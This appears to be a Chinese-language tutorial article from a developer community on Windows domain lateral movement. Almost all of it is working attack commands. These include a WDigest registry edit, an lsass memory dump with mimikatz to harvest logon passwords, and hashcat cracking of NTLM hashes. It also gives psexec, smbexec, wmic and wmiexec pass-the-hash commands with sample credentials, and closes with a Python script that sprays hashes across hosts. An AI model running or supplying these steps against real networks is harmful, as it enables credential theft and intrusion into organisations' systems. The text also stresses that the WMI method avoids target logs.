内网安全-域横向smb&wmi明文或hash传递-阿里云开发者社区

内网安全-域横向smb&wmi明文或hash传递

2023-05-28 120

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： 内网安全-域横向smb&wmi明文或hash传递

#知识点1：

Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码

Windows2012以下版本如安装KB2871997补丁，同样也会导致无法获取明文密码

针对以上情况，我们提供了4种方式解决此类问题

1.利用哈希hash传递(pth，ptk等)进行移动

2.利用其它服务协议(SMB,WMI等)进行哈希移动

3.利用注册表操作开启Wdigest Auth值进行获取

4.利用工具或第三方平台(Hachcat)进行破解获取

#知识点2：

Windows系统LM Hash及NTLM Hash加密算法，个人系统在Windows vista后，服务器系统在Windows 2003以后，认证方式均为NTLM Hash。

#注册表修改

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

Procdump+Mimikatz配合获取

https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

mimikatz上执行：

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full"

Hashcat破解获取Windows NTML Hash

https://github.com/hashcat/hashcat

hashcat -a 0 -m 1000 hash_file --force

参考链接：

https://www.freebuf.com/sectool/164507.html

域横向移动SMB服务利用-psexec,smbexec

利用SMB服务可以通过明文或hash传递来远程执行，条件445服务端口开放。

#psexec第一种：先有ipc链接，psexec需要明文或hash传递
net use \\10.4.7.52\ipc$ "admin!@#45" /user:hack\administrator
# 需要先有ipc链接 -s以System权限运行
psexec \\10.4.7.52 -s cmd

#psexec第二种：不用建立IPC直接提供明文账户密码
psexec \\10.4.7.52 -u hack/administrator -p admin!@#45 -s cmd

# hash 登录
psexec -hashes :518b98ad4178a53695dc997aa02d455c hack/administrator@10.4.7.52

#smbexec无需先ipc链接 明文或hash传递
smbexec hack/administrator:admin!@#45@10.4.7.50/52

smbexec ./administrator:123@10.4.7.52

smbexec -hashes :518b98ad4178a53695dc997aa02d455c hack/administrator@10.4.7.52

域横向移动WMI服务利用-cscript,wmiexec,wmic

WMI(Windows Management Instrumentation) 是通过135端口进行利用，支持用户名明文或者hash的方式进行认证，并且该方法不会在目标日志系统留下痕迹。

#自带WMIC 明文传递 无回显
wmic /node:10.4.7.52 /user:hack\administrator /password:123 process call create "cmd.exe /c  ipconfig >C:\1.txt"

#自带cscript明文传递 有回显
cscript  wmiexec.vbs /shell 10.4.7.52 hack/administrator@admin!@#45

#套件impacket wmiexec  明文或hash传递 有回显exe版本
wmiexec ./administrator:123@10.4.7.52 "whoami"
wmiexec hack/administrator:admin!@#45@10.4.7.52 "whoami"
wmiexec -hashes :518b98ad4178a53695dc997aa02d455c hack/administrator@10.4.7.52 "whoami"

域横向移动以上服务hash批量利用-python编译exe

#pyinstaller.exe -F fuck_neiwang_002.py
import os,time
ips={
    '10.4.7.50',
    '10.4.7.51'
    '10.4.7.52'
}
users={
    'Administrator',
    'hack'
}
hashs={
    'ccef208c6485269c20db2cad21734fe7',
    '518b98ad4178a53695dc997aa02d455c'
}
for ip in ips:
    for user in users:
        for mimahash in hashs:
            #wmiexec -hashes :hash god/user@ip whoami
            exec = "wmiexec -hashes :"+mimahash+" god/"+user+"@"+ip+" whoami"
            print('--->' + exec + '<---')
            os.system(exec)
            time.sleep(0.5)